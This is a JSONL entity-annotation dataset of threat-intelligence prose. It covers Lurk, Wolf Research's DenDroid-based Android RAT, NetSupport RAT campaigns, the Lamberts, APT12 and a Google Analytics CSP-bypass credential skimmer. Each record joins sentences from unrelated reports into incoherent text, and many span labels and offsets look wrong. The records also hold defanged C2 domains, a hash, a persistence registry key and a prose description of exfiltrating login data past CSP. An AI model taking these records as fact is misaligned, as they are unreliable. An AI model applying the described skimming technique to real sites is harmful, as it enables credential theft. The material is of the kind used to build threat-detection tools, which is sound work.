{"text": "They mentioned an Android , iOS and Windows remote access tool ( RAT ) . When we first encountered Lurk , in 2011 , it was a nameless Trojan . Opening the .PDF file drops and executes a malware in a victim \u2019s system . We should note that SocGholish used to retrieve media files from separate web requests until more recently when it started using self - contained Base64 encoded images .", "spans": [{"start": 18, "end": 25, "label": "System"}, {"start": 28, "end": 31, "label": "System"}, {"start": 36, "end": 43, "label": "System"}, {"start": 99, "end": 103, "label": "System"}, {"start": 155, "end": 159, "label": "Indicator"}, {"start": 238, "end": 248, "label": "Malware"}]}
{"text": "Their findings showed that Wolf is headquartered in Germany with offices in Cyprus , Bulgaria , Romania , India and ( possibly ) the U.S . While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions . The malware displays a blank .PDF file or a decoy document related to the targeted attack . There are different installation flows for this campaign , but we will focus on the one that uses a URL shortcut .", "spans": [{"start": 175, "end": 188, "label": "Organization"}, {"start": 551, "end": 559, "label": "Organization"}]}
{"text": "The organization was closed after the CSIS presentation . This article is an attempt to share this experience with other experts , particularly the IT security specialists in companies and financial institutions that increasingly find themselves the targets of cyber-attacks . The emails normally come from compromised personal accounts or are entirely spoofed . This shorcut uses the WebDav HTTP protocol extension to retrieve the file launcher-upd.hta from a remote server : This heavily obfuscated script is responsible for the execution of PowerShell that downloads the final malware payload ( NetSupport RAT ) .", "spans": [{"start": 38, "end": 42, "label": "Organization"}, {"start": 148, "end": 150, "label": "Organization"}, {"start": 189, "end": 211, "label": "Organization"}, {"start": 281, "end": 287, "label": "System"}, {"start": 477, "end": 595, "label": "Malware"}, {"start": 598, "end": 612, "label": "Malware"}]}
{"text": "However , the director created a new organization in Cyprus named LokD . In most cases , the attackers only had to infect the computer on which the RBS software was installed in order to start stealing the cash . emails from spoofed senders were usually sent via mail servers in the United States and China . Malwarebytes 's EDR shows the full attack chain ( please click to enlarge ): The NetSupport RAT files are hosted on the same compromised WordPress site used earlier to download the Internet shortcut .", "spans": [{"start": 66, "end": 70, "label": "Organization"}, {"start": 213, "end": 219, "label": "System"}, {"start": 309, "end": 324, "label": "Organization"}, {"start": 390, "end": 404, "label": "Malware"}]}
{"text": "This new organization proposed the creation of a more secure Android phone . We were soon able to help investigate another incident involving Lurk . The malware also sets the executable file \u2019s attributes to \u201c Hidden. \u201d Some of the file names the attackers used include : winhlps.exe , acrotry.exe , AcroRd32.exe , Updater.exe . The RAT 's main binary is launched from \" C:\\Users\\%username%\\AppData\\Roaming\\BranScale\\client32.exe \" .", "spans": [{"start": 61, "end": 68, "label": "System"}, {"start": 142, "end": 146, "label": "System"}, {"start": 272, "end": 283, "label": "Indicator"}, {"start": 286, "end": 297, "label": "Indicator"}, {"start": 300, "end": 312, "label": "Indicator"}, {"start": 315, "end": 326, "label": "Indicator"}]}
{"text": "Based on the organization website , it also proposes services and developed zero-day vulnerabilities to test their own products : Zero-day research from lokd.com We can see that the organization owner still has an interest in Android devices . This event significantly affected the Russian cybercriminal world as the gang had stolen hundreds of millions of rubles during a few years of activity , and was considered a \" leader \" among cybercriminals . In order for the malware to survive rebooting , it normally creates the following registry run key : HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run . Fake browser updates are a very common decoy used by malware authors .", "spans": [{"start": 76, "end": 100, "label": "Vulnerability"}, {"start": 153, "end": 161, "label": "Organization"}, {"start": 226, "end": 233, "label": "System"}]}
{"text": "Based on infrastructure overlaps and leaked information , we assess with high confidence that the malware we identified and present in this paper is linked to Wolf Research . In Russia , there were several relatively large cybercriminal groups engaged in financial theft via attacks on RBS . The registry run key , in turn , points to the malware that has been dropped . In addition to SocGholish , the Domen toolkit was a well - built framework that emerged in 2019 while another campaign known as sczriptzzbn dropped SolarMarker leading to the NetSupport RAT in both cases .", "spans": [{"start": 159, "end": 172, "label": "Organization"}, {"start": 386, "end": 396, "label": "Malware"}, {"start": 403, "end": 416, "label": "Malware"}, {"start": 499, "end": 510, "label": "Malware"}, {"start": 519, "end": 530, "label": "Malware"}, {"start": 546, "end": 560, "label": "Malware"}]}
{"text": "One of the samples ( e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 ) uses the C2 server svcws [ . In April 2013 , a year after we found the \" bodiless \" Lurk module , the Russian cybercriminal underground exploited several families of malicious software that specialized in attacks on banking software . The value name of this entry varies from sample to sample . Initial access brokers use tools like NetSupport RAT to gather information and perform additional actions on victims of interest .", "spans": [{"start": 21, "end": 85, "label": "Indicator"}, {"start": 107, "end": 116, "label": "Indicator"}, {"start": 172, "end": 183, "label": "System"}, {"start": 421, "end": 435, "label": "System"}]}
{"text": "] ponethus [ . Through the information exchanges used by people in the security industry , we learned that several Russian banks were struggling with malicious programs created specifically to attack a particular type of legal banking software . Some of the names the attackers used for it include : Adobe Assistant , Migrated . Stolen credentials can be resold to other threat actors tied to ransomware gangs .", "spans": [{"start": 71, "end": 88, "label": "Organization"}, {"start": 123, "end": 128, "label": "Organization"}, {"start": 300, "end": 315, "label": "System"}, {"start": 318, "end": 326, "label": "System"}]}
{"text": "] com . If it did , the malware downloaded additional modules , including ones allowing for the automatic creation of unauthorized payment orders , changing details in legal payment orders , etc . Upon installation , the malware starts communicating with one of its C&C servers . We will continue to monitor these campaigns and in particular SocGholish to see if the web delivery landscape changes .", "spans": [{"start": 32, "end": 61, "label": "Malware"}, {"start": 79, "end": 114, "label": "Malware"}, {"start": 148, "end": 164, "label": "Malware"}, {"start": 266, "end": 269, "label": "System"}, {"start": 342, "end": 352, "label": "Malware"}]}
{"text": "Based on our research and Beno\u00eet Ancel 's tracker , this C2 was used by Wolf Intelligence : Additionally , we identified two empty panels on a C2 server . As far as we can judge from the data we have , in 2014 the criminal group behind Lurk seriously reduced its activity and \" lived from hand to mouth \" , attacking anyone they could , including ordinary users . Most of the samples appeared to have at least three C&C servers hard coded for redundancy . Malwarebytes customers are protected as we detect the infrastructure and final payload used in these attacks .", "spans": [{"start": 72, "end": 89, "label": "Organization"}, {"start": 236, "end": 240, "label": "System"}, {"start": 416, "end": 419, "label": "System"}, {"start": 456, "end": 468, "label": "Organization"}]}
{"text": "The new one with the title \" Coralco Archimedes , '' and an older version with the title \" Wolf Intelligence : '' New panel Old panel The new panel name contains \" Coralco '' in its name . In February 2015 , Kaspersky Lab 's Global Research and Analysis Team ( GReAT ) released its research into the Carbanak campaign targeting financial institutions . Some samples alternatively use an FGKD.jsp or an FPK.jsp file . Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected .", "spans": [{"start": 208, "end": 221, "label": "Organization"}, {"start": 261, "end": 266, "label": "Organization"}, {"start": 328, "end": 350, "label": "Organization"}, {"start": 387, "end": 395, "label": "Indicator"}, {"start": 402, "end": 409, "label": "Indicator"}]}
{"text": "Coralco Tech is an organization located in Cyprus and providing interception tools . Since 2011 , the robbers had allegedly been stealing money directly from bank accounts in Russia and other countries of the Commonwealth of Independent States ( CIS ) by using a Trojan called Lurk . The Base64 blob is of particular interest . The HyperText Transfer Protocol ( HTTP ) redirect status response code indicates that the resource requested has been temporarily moved to the URL given by the header .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 263, "end": 269, "label": "System"}, {"start": 277, "end": 281, "label": "System"}, {"start": 328, "end": 368, "label": "System"}, {"start": 409, "end": 494, "label": "Indicator"}]}
{"text": "We can not say for sure if Wolf Research and Coralco Tech are linked , but this panel name , their offerings and the panel layout would suggest it should be considered suspiciously linked . which they launched targeted attacks against Russian banks , businesses and media companies . It makes use of a custom Base64 alphabet . A browser redirects to this page but search engines do n't update their links to the resource ( in ' SEO - speak ' , it is said that the ' link - juice ' is not sent to the new URL ) .", "spans": [{"start": 27, "end": 40, "label": "Organization"}, {"start": 45, "end": 57, "label": "Organization"}, {"start": 243, "end": 248, "label": "Organization"}, {"start": 251, "end": 261, "label": "Organization"}, {"start": 266, "end": 281, "label": "Organization"}, {"start": 329, "end": 336, "label": "System"}]}
{"text": "Coralco Tech 's services description . Lurk uses a form of steganography : that's where one file is hidden away inside another file of a completely different sort , such as an image , audio , or video file . Once decoded , this blob reveals a standardized structure of the information sent to the registered C&C server , which includes the following details : Computer name , Local IP address , Proxy server IP and port , Malware ID . It is therefore recommended to set the code only as a response for or methods and to use instead , as the method change is explicitly prohibited in that case .", "spans": [{"start": 39, "end": 43, "label": "System"}, {"start": 100, "end": 131, "label": "Malware"}, {"start": 308, "end": 311, "label": "System"}]}
{"text": "VICTIMOLOGY ON THE IDENTIFIED CAMPAIGNS The campaigns we analyzed targeted Android devices in Thailand . The latest version of Madi also has the ability to monitor the Russian social network Vkontakte ( VK ) along with the Jabber messaging platform to look for users who visit websites that contain words like \" USA \" , \" Skype \" , and \" gov \" . To date , we have seen several custom Base64 alphabets , including : +NO5RZaGHviIjhYq8b4ndQ=p012ySTcCDrs/xPgUz67FM3wemKfkJLBo9VtWXlEuA , HZa4vjIiGndQ=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu , j4vpGZaHnIdQ=i012y+N/zPgUO5RSTx67FMhYb8q3we mKckJLBofCDrs9VtWXlEu , p12kJLBofCDrs9VtWXlEuainyj4vd+=H0GZIQNO5RST/ zPgUx67FMhYb8q3wemKc , aZHGviIj4ndQ=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu , ZvQIajHi4ndG=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu . CSP can define a list of domains that the browser should be allowed to interact with for the visited URL .", "spans": [{"start": 75, "end": 82, "label": "System"}, {"start": 820, "end": 823, "label": "Organization"}, {"start": 862, "end": 869, "label": "System"}, {"start": 921, "end": 924, "label": "System"}]}
{"text": "The C2 server domain is linked to Thai food : Nampriknum [ . Madi was found capturing computer screens , recording audio and stealing screenshots , keystrokes , documents and e-mail correspondence from \" Middle Eastern critical infrastructure engineering firms , government agencies , financial houses and academia . Some similarities exist across different versions of the Base64 alphabet , which indicates that these are most likely not completely randomly generated . Designed to guard against XSS attacks , CSP helps control which domains can be accessed as part of a page and therefore restricts which domains to share data with .", "spans": [{"start": 46, "end": 60, "label": "Indicator"}, {"start": 219, "end": 260, "label": "Organization"}, {"start": 263, "end": 282, "label": "Organization"}, {"start": 285, "end": 301, "label": "Organization"}, {"start": 306, "end": 314, "label": "Organization"}, {"start": 497, "end": 508, "label": "Organization"}, {"start": 511, "end": 514, "label": "Organization"}]}
{"text": "] net : Nam Phrik Num Somtum [ . A timeline of new activity can be scoped out for the group , with the greatest number of related downloaders created by the developers in December 2011 , Feb and March of 2012 , followed by June of 2012 . Instead , the attackers manually cut and pasted older versions after altering some parts . These restrictions are specified by a list of allowed URIs .", "spans": [{"start": 22, "end": 32, "label": "Indicator"}, {"start": 375, "end": 387, "label": "System"}]}
{"text": "] today : Som Tum We also identified comments in Thai on the C2 infrastructure mentioned in the previous chapter : MALWARE DenDroid The Android malware is based on the DenDroid Android malware . it reports to was created on August 10 , 2011 . The malware ID seems to be a campaign code with a different IP address for each attack . By analyzing field data we see a gap in the implementation of CSP , and even for sites that do use it correctly , this creates an open window to exfiltrate data .", "spans": [{"start": 123, "end": 131, "label": "Malware"}, {"start": 136, "end": 143, "label": "System"}, {"start": 168, "end": 176, "label": "Malware"}, {"start": 363, "end": 443, "label": "Vulnerability"}]}
{"text": "Several analysis reports were published on this malware in 2014 and , finally , the source code was leaked in 2015 . Since at least 2008 , The Lamberts have used multiple sophisticated attack tools against high-profile victims . Some of the campaign codes we have seen include : CRML_0505 , CRML_MIL , Firebox4 , JUST_0525 , ML0628 , MW0629 , OM222 . Our demonstration shows how using the Google Analytics API , a web skimmer can send data to be collected in his own account instance .", "spans": [{"start": 143, "end": 151, "label": "System"}, {"start": 279, "end": 288, "label": "Malware"}, {"start": 291, "end": 299, "label": "Malware"}, {"start": 302, "end": 310, "label": "Malware"}, {"start": 313, "end": 322, "label": "Malware"}, {"start": 325, "end": 331, "label": "Malware"}, {"start": 334, "end": 340, "label": "Malware"}, {"start": 343, "end": 348, "label": "Malware"}, {"start": 389, "end": 409, "label": "System"}, {"start": 412, "end": 425, "label": "Organization"}]}
{"text": "The original leak is no longer available on github.com , but a copy can be found here . Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) . The IXESHE campaign has been successfully executing targeted attacks since 2009 . As Google Analytics is allowed in the CSP configuration of many major sites , this demo shows how an attacker can bypass this security protection and steal data .", "spans": [{"start": 133, "end": 145, "label": "Organization"}, {"start": 185, "end": 200, "label": "Organization"}, {"start": 236, "end": 243, "label": "Organization"}, {"start": 273, "end": 295, "label": "Vulnerability"}, {"start": 298, "end": 311, "label": "Vulnerability"}, {"start": 320, "end": 326, "label": "Organization"}, {"start": 401, "end": 417, "label": "Organization"}, {"start": 436, "end": 439, "label": "Organization"}, {"start": 499, "end": 507, "label": "Organization"}]}
{"text": "The table below shows the commands available to the operator for tasking on infected devices . The attack leveraged malware we called ' BlackLambert ' , which was used to target a high profile organization in Europe . The attackers primarily use malicious .PDF files that exploit vulnerabilities in Adobe Reader , Acrobat , and Flash Player , including the use of two zero-day exploits\u2014one in 2009 and another in 2011 . Our gathered field data shows the following statistics on CSP usage across the Internet ( based on HTTPArchive March 2020 scan ):", "spans": [{"start": 136, "end": 148, "label": "System"}, {"start": 180, "end": 205, "label": "Organization"}, {"start": 256, "end": 260, "label": "Indicator"}, {"start": 299, "end": 311, "label": "System"}, {"start": 314, "end": 321, "label": "System"}, {"start": 328, "end": 340, "label": "System"}, {"start": 368, "end": 376, "label": "Vulnerability"}, {"start": 478, "end": 481, "label": "Organization"}]}
{"text": "This malware is simplistic in comparison to some modern-day Android malware . Their arsenal includes network-driven backdoors , several generations of modular backdoors , harvesting tools , and wipers . While the attackers primarily targeted East Asian governments in the past , they have also started targeting a telecommunications company and electronics manufacturers . We took google - analytics as an example , but other services can also be used .", "spans": [{"start": 60, "end": 67, "label": "System"}, {"start": 101, "end": 125, "label": "System"}, {"start": 151, "end": 168, "label": "System"}, {"start": 171, "end": 187, "label": "System"}, {"start": 194, "end": 200, "label": "System"}, {"start": 381, "end": 399, "label": "System"}]}
{"text": "The best example of that is that it does n't take advantage of the accessibility framework , collecting information on non-rooted devices . The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild . They kept track of their targeted attacks by embedding a \u201c campaign tag \u201d in the malware that appears to describe when each attack was launched and , in some cases , the nature of its target . As an example , we took the twitter login page , which implemented the following CSP rule ( which contains ): The following short JS code inserted into the site will send the credentials to google - analytics console controlled by us : The UA-#######- # parameter is the tag ID owner that Google Analytics uses to connect the data to a specific account .", "spans": [{"start": 159, "end": 181, "label": "System"}, {"start": 232, "end": 239, "label": "Organization"}, {"start": 262, "end": 278, "label": "Vulnerability"}, {"start": 281, "end": 294, "label": "Vulnerability"}, {"start": 537, "end": 544, "label": "System"}, {"start": 590, "end": 593, "label": "Organization"}]}
{"text": "The commands are self-explanatory and show the features included in the malware . Interestingly , while most Blue Lambert variants have version numbers in the range of 2.x , Green Lambert is mostly in 3.x versions . We found more than 40 of these campaign tags . Though Google meant to have this parameter be used to mention the page the user visited , we used it to exfiltrate the user name and password data encoded in base64 .", "spans": [{"start": 109, "end": 121, "label": "System"}, {"start": 174, "end": 187, "label": "System"}]}
{"text": "Some of them like takephoto , takevideo , recordaudio , getsentsms and uploadpictures are focused on espionage activities . While investigating one of these infections involving White Lambert ( network-driven implant ) and Blue Lambert ( active implant ) , we found yet another family of tools that appear to be related . The IXESHE attackers are notable for their use of compromised machines within a target \u2019s internal network as C&C servers . In our Google Analytics platform , we will see the data as : In our demo the DP will result in page view of Which will be decoded from base64 as : The source of the problem is that the CSP rule system is n\u2019t granular enough .", "spans": [{"start": 178, "end": 191, "label": "System"}, {"start": 223, "end": 235, "label": "System"}, {"start": 326, "end": 332, "label": "Organization"}, {"start": 432, "end": 435, "label": "System"}, {"start": 453, "end": 478, "label": "System"}, {"start": 568, "end": 587, "label": "Indicator"}, {"start": 631, "end": 634, "label": "Organization"}]}
{"text": "Others like transferbot , promptupdate and promptuninstall are meant to help the operator manage the malware . Versions of this particular orchestrator were found on other victims , together with White Lambert samples , indicating a close relationship between the White and Pink Lambert malware families . This helped disguise their activities . Recognizing and stopping the above malicious JavaScript request requires advanced visibility solutions that can detect the access and exfiltration of sensitive user data ( in this case the user \u2019s email address and password ) .", "spans": [{"start": 196, "end": 217, "label": "System"}, {"start": 264, "end": 269, "label": "System"}, {"start": 274, "end": 303, "label": "System"}, {"start": 381, "end": 409, "label": "Malware"}]}
{"text": "Version # 1 : June 2019 \u2014 Domain : databit [ . While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) . In addition , the attackers \u2019 use of the proxy tool , HTran , also helped mask their true location . The problem is that CSP does n't support query strings ( See Spec ):", "spans": [{"start": 35, "end": 46, "label": "Indicator"}, {"start": 172, "end": 188, "label": "Vulnerability"}, {"start": 191, "end": 204, "label": "Vulnerability"}, {"start": 263, "end": 268, "label": "System"}, {"start": 330, "end": 364, "label": "Vulnerability"}]}
{"text": "] today During our investigation , we identified at least four major releases of the RAT . This migration activity was last observed in October 2016 . While their identities remain unknown , the attackers behind the IXESHE campaign demonstrated that they were both determined and capable . Having such a gap with the most commonly used domain allowed with CSP is a major risk indicator of the threats that can come from other domains that are used to serve multiple accounts .", "spans": [{"start": 216, "end": 222, "label": "Organization"}, {"start": 376, "end": 474, "label": "Indicator"}]}
{"text": "The permissions on the first version of the malware lay out the foundations of a spying trojan . Most of the Blue and Green Lambert samples have two C&C servers hardcoded in their configuration block : a hostname and an IP address . While the malware used in the attacks were not very complicated by nature , these proved very effective . A possible solution would come from adaptive URLs , adding the ID as part of the URL or subdomain to allow admins to set CSP rules that restrict data exfiltration to other accounts .", "spans": [{"start": 109, "end": 139, "label": "System"}]}
{"text": "Permissions The package name follows the original style name used on DenDroid . Some of the known filenames for Gray Lambert are mwapi32.dll and poolstr.dll \u2013 it should be pointed though that the filenames used by the Lamberts are generally unique and have never been used twice . APT12 . In addition to the complexity of managing CSP rules , this vulnerability shows how widely used services such as Google Analytics can be subverted to bypass this protection .", "spans": [{"start": 69, "end": 77, "label": "Malware"}, {"start": 112, "end": 124, "label": "System"}, {"start": 129, "end": 140, "label": "System"}, {"start": 145, "end": 156, "label": "System"}, {"start": 218, "end": 226, "label": "System"}, {"start": 281, "end": 286, "label": "Organization"}, {"start": 401, "end": 417, "label": "System"}]}
{"text": "The code is obfuscated but not packed . Black Lambert was seen only briefly and we assume it was \" retired \" from the arsenal after being discovered by FireEye in 2014 . The attackers referred to as APT12 ( also known as IXESHE , DynCalc , and DNSCALC ) recently started a new campaign targeting organizations in Japan and Taiwan . Adversaries may communicate using a protocol and port pairing that are typically not associated .", "spans": [{"start": 40, "end": 53, "label": "System"}, {"start": 152, "end": 159, "label": "Organization"}, {"start": 199, "end": 204, "label": "Organization"}, {"start": 221, "end": 227, "label": "Organization"}, {"start": 230, "end": 237, "label": "Organization"}, {"start": 244, "end": 251, "label": "Organization"}, {"start": 332, "end": 343, "label": "Organization"}]}
{"text": "This malware also contains a screen recorder . The Lamberts toolkit spans across several years , with most activity occurring in 2013 and 2014 . APT12 is believed to be a cyber espionage group thought to have links to the Chinese People's Liberation Army . For example , HTTPS over port 8088[1 ] or port 587[2 ] as opposed to the traditional port 443 .", "spans": [{"start": 51, "end": 67, "label": "System"}, {"start": 145, "end": 150, "label": "Organization"}, {"start": 222, "end": 254, "label": "Organization"}, {"start": 271, "end": 350, "label": "Indicator"}]}
{"text": "This feature is implemented using another open-source software package that can be found here . To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 . APT12 's targets are consistent with larger People's Republic of China ( PRC ) goals . Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis / parsing of network data .", "spans": [{"start": 165, "end": 181, "label": "System"}, {"start": 198, "end": 211, "label": "System"}, {"start": 248, "end": 264, "label": "Vulnerability"}, {"start": 267, "end": 280, "label": "Vulnerability"}, {"start": 283, "end": 288, "label": "Organization"}, {"start": 327, "end": 353, "label": "Organization"}, {"start": 356, "end": 359, "label": "Organization"}, {"start": 370, "end": 381, "label": "Organization"}]}
{"text": "The service is implemented in the class com.serenegiant.service.ScreenRecorderService which is declared in the package manifest . Taking that into account , we classify the Lamberts as the same level of complexity as Regin , ProjectSauron , Equation and Duqu2 , which makes them one of the most sophisticated cyber espionage toolkits we have ever analysed . Intrusions and campaigns conducted by this group are in-line with PRC goals and self-interest in Taiwan . Adversaries may also make changes to victim systems to abuse non - standard ports .", "spans": [{"start": 40, "end": 85, "label": "Indicator"}, {"start": 173, "end": 181, "label": "System"}, {"start": 217, "end": 222, "label": "System"}, {"start": 225, "end": 238, "label": "System"}, {"start": 241, "end": 249, "label": "System"}, {"start": 254, "end": 259, "label": "System"}, {"start": 424, "end": 427, "label": "Organization"}, {"start": 464, "end": 475, "label": "Organization"}]}
{"text": "During our analysis of this sample , we did notice that the class itself is never called or used by the malware . Taking that into account , we classify the Lamberts as the same level of complexity as Regin , ProjectSauron , Equation and Duqu2 , which makes them one of the most sophisticated cyber espionage toolkits we have ever analysed . Additionally , the new campaigns we uncovered further highlight the correlation between APT groups ceasing and retooling operations after media exposure , as APT12 used the same strategy after compromising the New York Times in Oct 2012 . For example , Registry keys and other configuration settings can be used to modify protocol and port pairings.[3 ] APT - C-36 has used port 4050 for C2 communications.[4 ]", "spans": [{"start": 157, "end": 165, "label": "System"}, {"start": 201, "end": 206, "label": "System"}, {"start": 209, "end": 222, "label": "System"}, {"start": 225, "end": 233, "label": "System"}, {"start": 238, "end": 243, "label": "System"}, {"start": 500, "end": 505, "label": "Organization"}, {"start": 552, "end": 566, "label": "Organization"}, {"start": 696, "end": 706, "label": "Organization"}, {"start": 711, "end": 750, "label": "Indicator"}]}
{"text": "It remains available within the source code but no method of use takes place . On January 15 , Confiant exposed the activity of the Zirconium group , spreading malicious ads via a network of fake ad agencies through 2017 , in what amounted to the largest malvertising campaign of recent times . Much like Darwin \u2019s theory of biological evolution , APT12 been forced to evolve and adapt in order to maintain its mission . An APT32 backdoor can use HTTP over a non - standard TCP port ( e.g 14146 ) which is specified in the backdoor configuration.[5 ]", "spans": [{"start": 191, "end": 207, "label": "Organization"}, {"start": 348, "end": 353, "label": "Organization"}, {"start": 424, "end": 438, "label": "Malware"}, {"start": 443, "end": 548, "label": "Indicator"}]}
{"text": "Version # 2 : June - Aug. 2019 \u2014 Domain : somtum [ . Cadelle , uses Backdoor.Cadelspy . FireEye researchers discovered two possibly related campaigns utilizing two other backdoors known as THREEBYTE and WATERSPOUT . APT33 has used HTTP over TCP ports 808 and 880 for command and control.[1 ]", "spans": [{"start": 42, "end": 52, "label": "Indicator"}, {"start": 68, "end": 85, "label": "System"}, {"start": 88, "end": 95, "label": "Organization"}, {"start": 189, "end": 198, "label": "Malware"}, {"start": 203, "end": 213, "label": "Malware"}, {"start": 216, "end": 221, "label": "Organization"}, {"start": 226, "end": 289, "label": "Indicator"}]}
{"text": "] today This is the first version that shows the code organization evolution that will continue to be used on all other functions throughout this malware . Symantec telemetry identified Cadelle and Chafer activity dating from as far back as July 2014 , however , it's likely that activity began well before this date . Both backdoors were dropped from malicious documents built utilizing the \u201c Tran Duy Linh \u201d exploit kit , which exploited CVE-2012-0158 . BADCALL communicates on ports 443 and 8000 with a FakeTLS method.[6 ] Bankshot binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.[7 ] BendyBear has used a custom RC4 and XOR encrypted protocol over port 443 for C2.[8 ]", "spans": [{"start": 156, "end": 164, "label": "Organization"}, {"start": 394, "end": 407, "label": "System"}, {"start": 440, "end": 453, "label": "Vulnerability"}, {"start": 456, "end": 463, "label": "Malware"}, {"start": 464, "end": 498, "label": "Indicator"}, {"start": 526, "end": 534, "label": "Malware"}, {"start": 535, "end": 582, "label": "Indicator"}, {"start": 626, "end": 635, "label": "Malware"}, {"start": 640, "end": 708, "label": "Indicator"}]}
{"text": "Code structure Obviously , this code is not obfuscated when compared with the previous version it becomes clear that this is the same code base . Chafer , uses Backdoor.Remexi . These documents were also emailed to organizations in Japan and Taiwan . During C0018 , the threat actors opened a variety of ports , including ports 28035 , 32467 , 41578 , and 46892 , to establish RDP connections.[9 ]", "spans": [{"start": 160, "end": 175, "label": "System"}, {"start": 270, "end": 283, "label": "Organization"}, {"start": 312, "end": 395, "label": "Indicator"}]}
{"text": "One of the first changes that stands out is that the screen recording feature mentioned in the previous sample has been removed . Cadelle 's threats are capable of opening a back door and stealing information from victims' computers . While APT12 has previously used THREEBYTE , it is unclear if APT12 was responsible for the recently discovered campaign utilizing THREEBYTE . Cyclops Blink can use non - standard ports for C2 not typically associated with HTTP or HTTPS traffic.[10 ] DarkVishnya used ports 5190 and 7900 for shellcode listeners , and 4444 , 4445 , 31337 for shellcode C2.[11 ]", "spans": [{"start": 241, "end": 246, "label": "Organization"}, {"start": 267, "end": 276, "label": "Malware"}, {"start": 296, "end": 301, "label": "Organization"}, {"start": 365, "end": 374, "label": "Malware"}, {"start": 377, "end": 390, "label": "Malware"}, {"start": 427, "end": 482, "label": "Indicator"}, {"start": 485, "end": 496, "label": "Malware"}, {"start": 497, "end": 592, "label": "Indicator"}]}
{"text": "A new class was added called com.utils.RestClient . Chafer , uses Backdoor.Remexi.B . Similarly , WATERSPOUT is a newly discovered backdoor and the threat actors behind the campaign have not been positively identified . Derusbi has used unencrypted HTTP on port 443 for C2.[12 ]", "spans": [{"start": 29, "end": 49, "label": "Indicator"}, {"start": 66, "end": 83, "label": "System"}, {"start": 98, "end": 108, "label": "Malware"}, {"start": 220, "end": 227, "label": "Malware"}]}
{"text": "This class is based on public code belonging to the package praeda.muzikmekan , which can be found here among other places . registrant information points to activity possibly as early as 2011 . However , the WATERSPOUT campaign shared several traits with the RIPTIDE and HIGHTIDE campaign that we have attributed to APT12 . Emotet has used HTTP over ports such as 20 , 22 , 7080 , and 50000 , in addition to using ports commonly associated with HTTP / S.[13 ] FIN7 has used port - protocol mismatches on ports such as 53 , 80 , 443 , and 8080 during C2.[14 ]", "spans": [{"start": 60, "end": 77, "label": "Indicator"}, {"start": 209, "end": 219, "label": "Malware"}, {"start": 260, "end": 267, "label": "Malware"}, {"start": 272, "end": 280, "label": "Malware"}, {"start": 317, "end": 322, "label": "Organization"}, {"start": 461, "end": 465, "label": "Organization"}, {"start": 516, "end": 557, "label": "Indicator"}]}
{"text": "Just like in previous examples , the malware author does not use this package . These threats are capable of opening a back door and stealing information from victims' computers . From October 2012 to May 2014, FireEye observed APT12 utilizing RIPTIDE , a proxy-aware backdoor that communicates via HTTP to a hard-coded command and control ( C2 ) server . GoldenSpy has used HTTP over ports 9005 and 9006 for network traffic , 9002 for C2 requests , 33666 as a WebSocket , and 8090 to download files.[15 ] GravityRAT has used HTTP over a non - standard port , such as TCP port 46769.[16 ] HARDRAIN binds and listens on port 443 with a FakeTLS method.[17 ] HOPLIGHT has connected outbound over TCP port 443 with a FakeTLS method.[18 ] Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic , creating port - protocol mismatches.[19][20 ] MacMa has used TCP port 5633 for C2 Communication.[21 ]", "spans": [{"start": 211, "end": 218, "label": "Organization"}, {"start": 228, "end": 233, "label": "Organization"}, {"start": 244, "end": 251, "label": "Malware"}, {"start": 299, "end": 303, "label": "Indicator"}, {"start": 320, "end": 339, "label": "System"}, {"start": 342, "end": 344, "label": "System"}, {"start": 356, "end": 365, "label": "Malware"}, {"start": 370, "end": 503, "label": "Indicator"}, {"start": 506, "end": 516, "label": "Malware"}, {"start": 521, "end": 586, "label": "Indicator"}, {"start": 589, "end": 597, "label": "Malware"}, {"start": 598, "end": 653, "label": "Indicator"}, {"start": 656, "end": 664, "label": "Malware"}, {"start": 669, "end": 705, "label": "Indicator"}, {"start": 739, "end": 760, "label": "Malware"}, {"start": 761, "end": 874, "label": "Indicator"}, {"start": 877, "end": 882, "label": "Malware"}, {"start": 892, "end": 905, "label": "Indicator"}, {"start": 910, "end": 930, "label": "System"}]}
{"text": "Missing permissions The lack of the READ_FRAME_BUFFER permission can be justified by the removal of the screen record feature . executable compilation times suggest early 2012 . RIPTIDE \u2019s first communication with its C2 server fetches an encryption key , and the RC4 encryption key is used to encrypt all further communication . Magic Hound malware has communicated with its C2 server over TCP ports 4443 and 10151 using HTTP.[22][23 ]", "spans": [{"start": 178, "end": 185, "label": "Malware"}, {"start": 218, "end": 220, "label": "System"}, {"start": 330, "end": 349, "label": "Malware"}, {"start": 354, "end": 434, "label": "Indicator"}]}
{"text": "The ACCESS_SUPERUSER may have been removed because it was deprecated upon the release of Android 5.0 Lollipop which happened in 2014 . It's unclear how Cadelle infects its targets with Backdoor.Cadelspy . In June 2014, Arbor Networks published an article describing the RIPTIDE backdoor and its C2 infrastructure in great depth . Metamorfo has communicated with hosts over raw TCP on port 9999.[24 ]", "spans": [{"start": 89, "end": 100, "label": "System"}, {"start": 101, "end": 109, "label": "System"}, {"start": 185, "end": 202, "label": "System"}, {"start": 219, "end": 224, "label": "Organization"}, {"start": 270, "end": 286, "label": "Malware"}, {"start": 295, "end": 297, "label": "System"}, {"start": 330, "end": 339, "label": "Malware"}, {"start": 344, "end": 397, "label": "Indicator"}]}
